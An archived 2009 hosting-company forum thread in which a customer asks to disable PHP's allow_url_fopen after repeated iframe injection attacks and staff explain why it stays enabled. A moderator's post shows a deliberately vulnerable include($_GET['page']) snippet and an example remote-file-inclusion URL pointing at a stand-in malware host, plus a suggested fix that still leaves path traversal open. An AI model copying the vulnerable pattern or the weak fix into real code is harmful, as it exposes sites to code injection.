GetDotted Domains

Viewing Thread:
"allow_url_fopen"

The "Freeola Customer Forum" forum, which includes Retro Game Reviews, has been archived and is now read-only. You cannot post here or create a new thread or review on this forum.

Wed 15/07/09 at 15:31
Regular
Posts: 595
I have read in various articles that, when enabled, this poses code injection security risks.

Is it possible to disable this on my webspace (I see it is currently 'on')?

Neil
Tue 21/07/09 at 20:17
Regular
Posts: 595
Many thanks for your quick response.

N.
Tue 21/07/09 at 20:01
Staff Moderator
"Aargh! Broken..."
Posts: 1,408
As other users of our VIP service use this functionality (for things such as pulling in RSS feeds among other uses) we are unable to disable this functionality.
I must stress that the idea of this being a security risk is down to the programmer using functions relying on this not validating content properly and not due to the feature being enabled.
If you understand PHP here is a simple example:

On a page somewhere:


<?php
.....
....
include($_GET['page']);
...
...
?>


This allows someone to include other remote content by dong something similar to this:
http://www.yoursite.com/index.php?page=http://dodgymalwaresite.com?dodgyscript.php?inject

A simple fix would be to move your content pages to their own folder and then modify the code to this:


<?php
.....
....
include('page_dir/'.$_GET['page']);
...
...
?>


Try the .htaccess rules you asked support about and that may clear up you problems although we can't really help if the rewrite rules cause problems.
Tue 21/07/09 at 19:27
Regular
Posts: 595
@ Eccles

Any progress on disabling this yet?

N.
Thu 16/07/09 at 13:56
Regular
Posts: 595
Agreed.

I do hope you can invoke some kind of disabling of this. I believe it would greatly help.

I look forward to hearing any progress.

N.
Thu 16/07/09 at 13:51
Staff
Posts: 120
Neilj99 wrote:
> Many thanks.
>
> ...would the 'custom' site level php.ini not work if I included
> it in my site root - to save others' inconvenience?
>
> N.

We don't allow customers to overide PHP directives via their own php.ini files as this could allow customers who changed options to not just compromise their own webspaces but other customers on the same server. However it is probably possible to add a control panel option to allow certain safe options to be overidden on the same basis as the enable global vars option (another option which can allow security risks).
Wed 15/07/09 at 22:03
Regular
Posts: 595
Many thanks.

...would the 'custom' site level php.ini not work if I included it in my site root - to save others' inconvenience?

N.
Wed 15/07/09 at 21:47
Staff Moderator
"Aargh! Broken..."
Posts: 1,408
I will see whether we can have this feature disabled. It might inconvenience some customers who use it but they should be able to use cURL instead to achieve the same thing.

If you are seeing repeated injection attacks on your site then this suggests that you are accepting input that is not the sanitized. url_fopen is relatively safe if the people who write the code that makes use of it make sure they check any data it brings in. Not doing this is what causes problem and that is why it's generally considered a good idea to disable it.
Wed 15/07/09 at 21:36
Regular
Posts: 595
With respect to your knowledge, I'm not entirely convinced.

I direct you to this article

http://tutorials.ausweb.com.au/web/Tutorials/PHP-and-MySql/Security-issues---allow_url_fopen/

I have and am still experiencing iframe code injection attacks on my entire webspace, and am getting sick of it.

I believe if allow_url_fopen was disabled it would help me immensely.

I have read that I can include

allow_url_fopen=off

in a site level php.ini but I have tried this and it appears not to make any difference to my webspace.

N.
Wed 15/07/09 at 16:42
Regular
"Embrace the Martian"
Posts: 285
Chill Winstaaaan :D It is not that much of an issue to you, it is actually a security feature for server owners to protect themselves against users, such as you using fopen to grab external web pages and using them for malicious purposes. Just do not use fopen to reference external URLs and you will be doing the same as having allow_url_fopen turned off.
Wed 15/07/09 at 15:31
Regular
Posts: 595
I have read in various articles that, when enabled, this poses code injection security risks.

Is it possible to disable this on my webspace (I see it is currently 'on')?

Neil

Freeola & GetDotted are rated 5 Stars

Check out some of our customer reviews below:

Many thanks!
You were 100% right - great support!
Just a quick note to say thanks for a very good service ... in fact excellent service..
I am very happy with your customer service and speed and quality of my broadband connection .. keep up the good work . and a good new year to all of you at freeola.
Matthew Bradley

View More Reviews

Need some help? Give us a call on 01376 55 60 60

Go to Support Centre
Feedback Close Feedback

It appears you are using an old browser, as such, some parts of the Freeola and Getdotted site will not work as intended. Using the latest version of your browser, or another browser such as Google Chrome, Mozilla Firefox, or Opera will provide a better, safer browsing experience for you.